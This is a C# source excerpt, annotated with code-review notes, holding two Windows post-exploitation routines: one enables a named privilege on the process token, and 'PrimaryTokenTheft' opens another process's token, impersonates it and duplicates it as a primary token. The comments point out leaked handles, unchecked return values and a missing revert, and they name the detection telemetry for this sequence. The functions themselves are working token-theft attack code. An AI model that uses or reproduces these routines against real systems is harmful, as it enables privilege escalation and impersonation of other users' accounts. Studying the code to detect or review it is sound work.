/// <summary>
/// Enables the named privilege on the current process's primary token, unless the
/// token already holds it enabled.
/// </summary>
/// <param name="priv">Privilege name handed straight to LookupPrivilegeValue; it is not validated here.</param>
/// <returns>
/// true when the token already has the privilege or AdjustTokenPrivileges returned TRUE;
/// false on every other path (OpenProcessToken failed, or AdjustTokenPrivileges returned FALSE).
/// </returns>
/// <exception cref="Exception">
/// Anything thrown by the P/Invoke layer is rethrown as <c>throw ex;</c>, which resets the stack trace.
/// </exception>
/// <remarks>
/// NOTE(review): the token handle obtained here is never closed on any path — no CloseHandle
/// appears in this method. From a defensive standpoint, privilege enablement on the own process
/// token is a common precursor step in post-exploitation tooling and is worth logging alongside
/// the process that performs it.
/// </remarks>
public static bool AdjustTokenPrivilege(string priv)
{
    try
    {
        Pinvoke.PTOKEN_PRIVILEGES tPriv;
        // GetCurrentProcess returns a pseudo-handle; it does not need CloseHandle.
        IntPtr hProc = Pinvoke.GetCurrentProcess();
        IntPtr tHandle = IntPtr.Zero;
        // TOKEN_QUERY is required for PrivilegeCheck below, TOKEN_ADJUST_PRIVILEGES for AdjustTokenPrivileges.
        if (Pinvoke.OpenProcessToken(hProc, Pinvoke.TOKEN_ADJUST_PRIVILEGES | Pinvoke.TOKEN_QUERY, ref tHandle))
        {
            tPriv.Count = 1;
            tPriv.Luid = 0;
            tPriv.Attr = Pinvoke.SE_PRIVILEGE_ENABLED;
            // NOTE(review): the BOOL result is ignored. If the name is unknown, execution continues
            // with whatever tPriv.Luid holds (initialised to 0 above) — confirm the wrapper's behaviour.
            Pinvoke.LookupPrivilegeValue(null, priv, ref tPriv.Luid);
            // Build a one-entry PRIVILEGE_SET so PrivilegeCheck can tell us whether the
            // privilege is already enabled; ALL_NECESSARY with one entry means "this one".
            Pinvoke.PRIVILEGE_SET privs = new Pinvoke.PRIVILEGE_SET
            {
                Privilege = new Pinvoke.LUID_AND_ATTRIBUTES[1],
                Control = Pinvoke.PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY,
                PrivilegeCount = 1
            };
            privs.Privilege[0].Luid = tPriv.Luid;
            privs.Privilege[0].Attributes = Pinvoke.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED;
            bool privCheck;
            // NOTE(review): PrivilegeCheck's own return value is not checked, so a failed call
            // presumably reads as "privilege not present" and falls into the adjust branch.
            Pinvoke.PrivilegeCheck(tHandle, ref privs, out privCheck);
            if (!privCheck)
            {
                Console.WriteLine("[*] Trying to adjust token for privilege '{0}'!", priv);
                // NOTE(review): per the Win32 contract a TRUE return here does not prove the
                // privilege was enabled — when the token does not hold it, the call still
                // succeeds and GetLastError reports ERROR_NOT_ALL_ASSIGNED, which is not checked.
                if (Pinvoke.AdjustTokenPrivileges(tHandle, false, ref tPriv, 0, IntPtr.Zero, IntPtr.Zero))
                {
                    Console.WriteLine("[+] Success adjusting privilege to '{0}'!", priv);
                    return(true);
                }
            }
            else
            {
                Console.WriteLine("[+] Process token already have '{0}'!", priv);
                return(true);
            }
        }
    }
    catch (Exception ex)
    {
        // NOTE(review): `throw ex;` discards the original stack trace; `throw;` would keep it.
        throw ex;
    }
    // NOTE(review): the last-error value is read after intervening Console.WriteLine calls on some
    // paths, so the code printed may not belong to the API call that actually failed.
    Console.WriteLine("[-] Error adjusting privilege {0}", Marshal.GetLastWin32Error());
    return(false);
}
/// <summary>
/// Opens the process identified by <paramref name="pid"/>, opens its access token, impersonates it
/// on the calling thread, and returns a duplicate of that token as a primary token.
/// </summary>
/// <param name="pid">Process id whose token is opened; not validated here.</param>
/// <returns>
/// The duplicated primary token handle when every step succeeds, otherwise <see cref="IntPtr.Zero"/>.
/// </returns>
/// <remarks>
/// Side effects a caller must be aware of: on the success path the calling thread is left
/// impersonating the target (ImpersonateLoggedOnUser is never paired with a RevertToSelf in this
/// method), and on every path neither the process handle nor the original token handle is closed.
/// From a detection standpoint, a cross-process OpenProcessToken requesting
/// TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY followed by DuplicateTokenEx with TokenPrimary is the
/// canonical token-theft sequence that process/token telemetry is typically monitored for.
/// </remarks>
public static IntPtr PrimaryTokenTheft(int pid)
{
    IntPtr PrimaryToken = new IntPtr();
    // Only QueryInformation is requested on the process; the second argument (bInheritHandle in the
    // Win32 signature, assuming the wrapper mirrors it) is true, so the handle is inheritable.
    IntPtr hProcess = Pinvoke.OpenProcess(Pinvoke.ProcessAccessFlags.QueryInformation, true, pid);
    if (hProcess != IntPtr.Zero)
    {
        IntPtr tokenHandle = new IntPtr();
        // Access rights requested on the target's token: duplicate, assign as primary, and query.
        if (Pinvoke.OpenProcessToken(hProcess, Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY | Pinvoke.TOKEN_QUERY, ref tokenHandle))
        {
            // NOTE(review): impersonation is started before the duplicate is attempted and nothing
            // reverts it, so a failing DuplicateTokenEx still leaves the thread impersonating.
            if (Pinvoke.ImpersonateLoggedOnUser(tokenHandle))
            {
                // Fourth argument is the impersonation level; if the wrapper mirrors the Win32
                // signature, the bare 2 is SecurityImpersonation — TODO confirm against Pinvoke.
                if (Pinvoke.DuplicateTokenEx(tokenHandle, Pinvoke.TOKEN_ADJUST_DEFAULT | Pinvoke.TOKEN_ADJUST_SESSIONID | Pinvoke.TOKEN_QUERY | Pinvoke.TOKEN_DUPLICATE | Pinvoke.TOKEN_ASSIGN_PRIMARY, IntPtr.Zero, 2, Pinvoke.TOKEN_TYPE.TokenPrimary, out PrimaryToken))
                {
                    Console.WriteLine("[+] Success duplicating primary token!");
                    return(PrimaryToken);
                }
            }
        }
    }
    // NOTE(review): one message covers four distinct failure points (OpenProcess, OpenProcessToken,
    // ImpersonateLoggedOnUser, DuplicateTokenEx); the last-error code is what distinguishes them,
    // and it may be stale if anything ran between the failing call and this line.
    Console.WriteLine("[-] Error impersonating process token! ({0})", Marshal.GetLastWin32Error());
    return(IntPtr.Zero);
}